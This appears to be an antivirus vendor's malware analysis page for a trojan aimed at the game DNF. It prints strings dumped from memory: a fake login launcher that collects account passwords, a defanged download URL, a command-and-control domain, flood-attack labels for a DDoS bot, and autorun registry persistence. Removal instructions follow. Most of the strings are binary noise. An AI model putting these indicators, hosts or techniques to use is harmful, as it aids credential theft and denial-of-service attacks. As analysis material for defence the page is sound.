?SetAttribute@CWebBrowserUI@DuiLib@@MAEXPBD0@Z
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetAutoURLDetect@CRichEditUI@DuiLib@@QAE_N_N@Z
?SetDisabledImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetEnabled@CHotKeyUI@DuiLib@@UAEX_N@Z
?SetFocusedImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?SetHotImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetHotKey@CHotKeyUI@DuiLib@@QAEXGG@Z
?SetHotKey@CHotKeyWnd@DuiLib@@QAEXGG@Z
?SetInternVisible@CHotKeyUI@DuiLib@@UAEX_N@Z
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?SetLayeredOpacity@CPaintManagerUI@DuiLib@@QAEXE@Z
?SetNativeBkColor@CHotKeyUI@DuiLib@@QAEXK@Z
?SetNormalImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetOpacity@CPaintManagerUI@DuiLib@@QAEXE@Z
?SetPasswordChar@CEditUI@DuiLib@@QAEXD@Z
?SetPasswordMode@CEditUI@DuiLib@@QAEX_N@Z
?SetPos@CHotKeyUI@DuiLib@@QAEXUtagRECT@@@Z
?SetProperty@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_WPAUtagVARIANT@@@Z
?SetRules@CHotKeyWnd@DuiLib@@QAEXGG@Z
?SetText@CHotKeyUI@DuiLib@@UAEXPBD@Z
?SetVisible@CHotKeyUI@DuiLib@@UAEX_N@Z
?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?TitleChange@CWebBrowserUI@DuiLib@@IAEXPA_W@Z
?TranslateAcceleratorA@CFlashUI@DuiLib@@EAEJPAUtagMSG@@@Z
?TranslateAcceleratorA@CPaintManagerUI@DuiLib@@QAE_NPAUtagMSG@@@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateMessage@CPaintManagerUI@DuiLib@@SA_NQAUtagMSG@@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?_GetBaseMessageMap@CNotifyPump@DuiLib@@KGPBUDUI_MSGMAP@2@XZ
?_GetBaseMessageMap@WindowImplBase@DuiLib@@KGPBUDUI_MSGMAP@2@XZ
?_messageEntries@CNotifyPump@DuiLib@@0QBUDUI_MSGMAP_ENTRY@2@B
?_messageEntries@WindowImplBase@DuiLib@@0QBUDUI_MSGMAP_ENTRY@2@B
?messageMap@CNotifyPump@DuiLib@@1UDUI_MSGMAP@2@B
?messageMap@WindowImplBase@DuiLib@@1UDUI_MSGMAP@2@B
.?AVCMsgWnd@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyUI@DuiLib@@
.?AVCHotKeyWnd@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
#*1892 $
%,3:;4-&
zcÁ
Reality.log
D:\Reality.log
bg.png
.xGN'u
=m.kC
.Mt31*
%DS]M
uX'.cf
.AK~'
3T%x^
%c `$
%c^f\.
lL%cr
c.HI0
s.xxz
4%Fpo
.Dn`6
2.AZK
w&d%d
%c'La
,8.xs
|.XfB>'
H{f.Ba
hQk.hO
u]W%X
=F3%s
B2iH%C-
%tkEY
2 %CN
%u"Pd
cJ(%c
(.IYa
[\e@eB%F
V9%D@
9l%XM
.HQn^
s-x}{c
p.PaP-n
%dQ,k
.wEj!
uL%c]
q].Hy
`.cYC
btn_close_down.png
btn_close_highlight.png
btn_close_normal.png
BT_CLOSE.png}V{8
BT_DEFAULT.png
BT_MIN.png
BT_MSG.png
!.xQN
BT_TABLE.png
cb_hot.png
y.Qjh
xGÈ
Mv.vAN
cb_normal.png
.cgla
cb_pushed.png
%f(W]j
C.lkc
6.6.VK
~v..VN
cb_selected.png
%8SJi
checked.png
combo.png
]5`}.WBR(
edit_bk.png
5g%c>
{.Hyp
.vN.VN~!n.!
-f}:<
load_bg.png
login_bg.png
ez.kM
=*a%d
.kTSe
msg_bg.png
%>nh%u s=
notice.png
reg_bg.pngeV
j:qfe.ufF
update_bg.png
d&wr%uQ
BT_CLOSE.png
reg_bg.png
`.rdata
@.data
.rsrc
CNotSupportedException
CHttpFile
CCmdTarget
hhctrl.ocx
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
OLEACC.dll
D:\LoginGame\
\Release\update.pdb
WinExec
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
UnhookWindowsHookEx
CreateDialogIndirectParamW
GetKeyState
SetWindowsHookExW
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegOpenKeyW
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
UrlUnescapeW
SHLWAPI.dll
OLEAUT32.dll
InternetCrackUrlW
InternetCanonicalizeUrlW
InternetOpenUrlW
WININET.dll
.PAVCOleException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCHttpFile@@
.?AVCCmdUI@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCFileException@@
.PAVCInternetException@@
.?AVCCmdTarget@@
mV2.AHBC5D;<<(-
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
.YC z=7
GetProcessHeap
ntdll.dll
kernel32.dll
user32.dll
advapi32.dll
hid.dll
mscoree.dll
mscorwks.dll
mscorsvr.dll
KernelBase.dll
mscoreei.dll
clr.dll
diasymreader.dll
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
6ADVAPI32.DLL
MSVCRT.dll
PSAPI.DLL
RegOpenKeyExA
SHELL32.dll
.KHbZ
%uY_b
.azZU
}.NTF
fSql
q%X$:O
.dVFs
%U56|
Zm%.HP
P#F.HKf
45<.Hj<
5?.Hc
[?.HH
m%.HP
^%xP2
V1&%x
Y81sQl
3s.Qx
v0cMdf
.xZ_m2
SQlC
f.sxm
0%F@{5t{
.fqkj
.GXDm
F!.dR5
eHI}%J.de
_.YI z
]%xUUe!_k
.IhMx<$
QÈ]p.
.ZxD3
yi.tg
`&d.tD!;
nN%xX
mf.AoQ`
IH.Nh
/.Kf 
OÀp
Pq.lR
.sz>@
O%~.Jt
.xrqjsS
/mX%XUz
@kx%f
.LLJ1
G4.Ug
".Itu
-.uxu
ghJ.DC
l.jX;
\Release\LoginGame.pdb
>KERNEL32.dll
%GetProcessHeap
4MapVirtualKeyExA
%SetWindowRgn
ole32.dll
TGetKeyNameTextA
ShellExecuteA
ShellExecuteExA
GetKeyboardLayout
HttpQueryInfoA
0IWININET.dll
WS2_32.dll
IPHLPAPI.DLL
InternetOpenUrlA
IMM32.dll
FCOMCTL32.dll
gdiplus.dll
GdiplusShutdown
Safengine Protector v2.3.8.0
COMCTL32.dll
errorUrl
MSPDB110.DLL
ADVAPI32.DLL
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
hXXp://
@WININET.DLL
@comctl32.dll
@comdlg32.dll
@shell32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
KERNEL32.DLL
hXXp://down.dnffan.com:8082/lg
taskkill.exe /F /IM
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
1.0.0.1
LOGINGAME

%original file name%.exe_2956_rwx_01D06000_00001000:

D:\chengzhen\DNF\StartGame\Release\StartGame.pdb

Reality.log_1796_rwx_004EC000_00001000:

kCv.SCv?lCvg
ux
//./%s
X-X-X-X-X-X
00-00-00-00-00-00
TaskKill.exe
/F /IM DNF.exe
x -
%s x
20161029
skin\LoginGame\
res.xml
LoginGame.zip
LoginGame
edit.edit.account
edit.edit.oldpassword
edit.edit.newpassword
edit.edit.qq
edit.reg.account
edit.reg.password1
edit.reg.password2
edit.reg.qq
checkbox.login.save
edit.login.account
edit.login.password
button.login.enter
button.regaccount
button.cdk
button.editpwd
text.title
text.notice
.\Config.ini
Password
tabctrl.controls
text.load
text.check
text.login
text.build
\DNF.exe
\Script.pvf
%d.%d.%d.%d
update.exe
\update.exe
dnf.exe
DlgMain.xml
button.reg.cancel
button.reg.enter
button.edit.cancel
button.edit.enter
edit.cdk.account
button.cdk.cancel
button.cdk.query
button.cdk.enter
button.mainhome
button.down
button.paycheck

winnet.exe_1248:

.text
`.rdata
@.data
.rsrc
@.reloc
Bv.SCvf-
GetProcessWindowStation
Reality.log
winnet.dll
D:\chengzhen\DNF\StartGame\StartGame\winnet.pdb
KERNEL32.dll
GetCPInfo
C:\Windows\winnet.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
5,5.757;7
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
10.0.14393.206
winnet.exe
1.0.0.1

Reality.log_1796_rwx_00532000_00003000:

.?AVCMsgWnd@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyUI@DuiLib@@
.?AVCHotKeyWnd@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
#*1892 $
%,3:;4-&
zcÁ

Reality.log_1796_rwx_00536000_00003000:

20161029
Reality.log
D:\Reality.log

Reality.log_1796_rwx_006F2000_00001000:

KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
SHELL32.dll

Reality.log_1796_rwx_006FB000_00004000:

MSVCRT.dll
PSAPI.DLL
KERNEL32.dll
USER32.dll
SHELL32.dll

Reality.log_1796_rwx_007C6000_00002000:

%SetWindowRgn
GetKeyState
ole32.dll
TGetKeyNameTextA
ADVAPI32.dll
SHELL32.dll
GDI32.dll
ShellExecuteA
ShellExecuteExA
GetKeyboardLayout
HttpQueryInfoA
0IWININET.dll
WS2_32.dll
IPHLPAPI.DLL
InternetOpenUrlA
OLEAUT32.dll
IMM32.dll
FCOMCTL32.dll
gdiplus.dll
GdiplusShutdown
PSAPI.DLL
MSVCRT.dll
Safengine Protector v2.3.8.0

pack11.exe_3608:

`.rsrc
!"#$%&'()*
w.SCv
GetProcessWindowStation
operator
%Program Files%\Internet Explorer\iexplore.exe
GET %s%s%s%s%s%s%s%s%s%s
%d*%dMHz
Windows XP
Windows 2000
Windows 2003
Windows 2008
Windows 2008R2
Windows 7
Windows 2012
Windows 8
Windows 8.1
0.0.0.0
%d Gbps
%d Mbps
UDP_Flood
TCP_Flood
HTTP_Flood
D:\Program Files\svchost\spoolsv.exe
D:\Program Files\svchost\svchost.exe
E:\Program Files\svchost\spoolsv.exe
E:\Program Files\svchost\svchost.exe
%d.%d.%d.%d
%s|%s|%s|%s|%send
D:\chengzhen\
CC\svchost\Release\svchost.pdb
dd.dresou.net
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe
.text
`.rdata
@.data
.rsrc
@.reloc
CC\svchost\svchost\spoolsv.pdb
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>#>)>.>4>
GetProcessHeap
WinExec
RegOpenKeyExA
ShellExecuteA
URLDownloadToFileA
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
IPHLPAPI.DLL
SHELL32.dll
urlmon.dll
WS2_32.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Software\Microsoft\Windows\CurrentVersion\Run
D:\Program Files
D:\Program Files\svchost
E:\Program Files
E:\Program Files\svchost

pack11.exe_3608_rwx_00F41000_00022000:

!"#$%&'()*
w.SCv
GetProcessWindowStation
operator
%Program Files%\Internet Explorer\iexplore.exe
GET %s%s%s%s%s%s%s%s%s%s
%d*%dMHz
Windows XP
Windows 2000
Windows 2003
Windows 2008
Windows 2008R2
Windows 7
Windows 2012
Windows 8
Windows 8.1
0.0.0.0
%d Gbps
%d Mbps
UDP_Flood
TCP_Flood
HTTP_Flood
D:\Program Files\svchost\spoolsv.exe
D:\Program Files\svchost\svchost.exe
E:\Program Files\svchost\spoolsv.exe
E:\Program Files\svchost\svchost.exe
%d.%d.%d.%d
%s|%s|%s|%s|%send
D:\chengzhen\
CC\svchost\Release\svchost.pdb
dd.dresou.net
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe
.text
`.rdata
@.data
.rsrc
@.reloc
CC\svchost\svchost\spoolsv.pdb
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>#>)>.>4>
GetProcessHeap
WinExec
RegOpenKeyExA
ShellExecuteA
URLDownloadToFileA
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
Software\Microsoft\Windows\CurrentVersion\Run
D:\Program Files
D:\Program Files\svchost
E:\Program Files
E:\Program Files\svchost

spoolsv.exe_1928:

.text
`.rdata
@.data
.rsrc
@.reloc
Bv.SCvf-
GetProcessWindowStation
D:\Program Files\svchost\svchost.exe
E:\Program Files\svchost\svchost.exe
D:\chengzhen\
CC\svchost\svchost\spoolsv.pdb
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
D:\Program Files\svchost\spoolsv.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>#>)>.>4>
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
Software\Microsoft\Windows\CurrentVersion\Run


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    winnet.exe:1248
    Intel.exe:1900

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys (20 bytes)
    C:\Windows\winnet.dll (124 bytes)
    C:\Windows\winnet.exe (70 bytes)
    C:\Windows\System32\config\SYSTEM.LOG1 (7918 bytes)
    C:\$Directory (2304 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe (127 bytes)
    C:\Windows\LSP.dll (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe (7427 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\pack11[1].exe (6835 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "INTEL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
